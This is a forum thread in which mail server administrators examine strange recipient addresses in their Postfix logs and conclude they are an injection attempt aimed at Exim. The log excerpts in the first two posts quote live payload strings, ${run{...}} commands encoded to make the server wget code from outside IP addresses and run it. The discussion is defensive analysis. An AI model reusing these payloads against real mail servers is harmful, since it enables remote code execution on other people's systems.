| View previous topic :: View next topic |
| Author |
Message |
ipic
Guru
Joined: 29 Dec 2003
Posts: 433
Location: UK
|
 Posted: Thu Jun 20, 2019 8:04 am Post subject: What is this address in HELO trying to do (looks like code) |
 |
|
This turned up in my Postfix log last night: | Code: |
root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f81.187.207.23x22}}@localhost
root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f81.187.207.23x22}}@localhost
|
Has anyone seen this before?
Looks like some form of injection attack. Any advice on how to check if it worked?
81.187.207.23 is my host address.
I have blocked (in iptables) the addresses 213.227.155.101 and 64.50.180.45
My Postfix is stable up to date:
| Code: | ian ~ # eix -I postfix
[I] mail-mta/postfix
Available versions: ~*2.10.9 3.2.4 3.3.1-r1 3.3.4 ~3.4.5 ~3.4.5-r1 [M]~3.5_pre20190518 {+berkdb cdb doc dovecot-sasl +eai hardened ldap ldap-bind libressl lmdb mbox memcached mysql nis pam postgres sasl selinux sqlite ssl vda}
Installed versions: 3.3.4(08:34:45 28/05/19)(berkdb eai pam ssl -cdb -dovecot-sasl -hardened -ldap -ldap-bind -libressl -lmdb -mbox -memcached -mysql -nis -postgres -sasl -selinux -sqlite)
Homepage: http://www.postfix.org/
Description: A fast and secure drop-in replacement for sendmail
ian ~ # |
Thanks |
|
| Back to top |
|
 |
freke
Veteran
Joined: 23 Jan 2003
Posts: 1051
Location: Somewhere in Denmark
|
| Posted: Thu Jun 20, 2019 3:29 pm Post subject: |
|
|
Thanks - just noticed a lot of those in my logs, too | Code: | Jun 19 12:29:43 mail postfix/smtpd[11328]: NOQUEUE: reject: RCPT from unknown[45.55.94.254]: 450 4.2.0 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.156x22}}@vlh.dk>: Recipient address rejected: Greylisted for 300 seconds; from=<support@service.com> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.156x22}}@vlh.dk> proto=SMTP helo=<service.com>
Jun 19 18:18:16 mail postfix/smtpd[13558]: NOQUEUE: reject: RCPT from unknown[107.182.225.42]: 450 4.2.0 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.158x22}}@vlh.dk>: Recipient address rejected: Greylisted for 300 seconds; from=<support@service.com> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.158x22}}@vlh.dk> proto=SMTP helo=<service.com> |
I found this https://security.stackexchange.com/questions/212077/unusual-mail-headers-evidence-of-an-attempted-attack-have-i-been-pwned - looks like it's something to do with EXIM-servers.
Looks to me like it's trying to wget something from the ip to the mail-hosts tmp-dir and then run it.
What I notice though is that they're not actually connecting to my MX-ip - but some other IPs that I've got - but they're redirected to my mail-server because of the port-number....
[EDIT]
And this https://forums.gentoo.org/viewtopic-t-1097702.html  |
|
| Back to top |
|
|
ipic
Guru
Joined: 29 Dec 2003
Posts: 433
Location: UK
|
| Posted: Thu Jun 20, 2019 4:24 pm Post subject: |
|
|
Thanks for the references. It's quite exciting to be in on a current attack, in a weird way
In my case the mail got no further than Postfix (i.e. not delivered) since it failed one of the checks I've applied:
| Code: | | Recipient address rejected: need fully-qualified address |
A long time ago I enabled the "+" option when testing out multiple mail drops (I forget why), so I went off to check that this was no longer enabled. Not sure if it this would stop any issue should it have applied to Postfix. But I remember one of the cardinal security rule from my old job: "Never enable something unless it is known to be needed". |
|
| Back to top |
|
|
|
Networking & Security
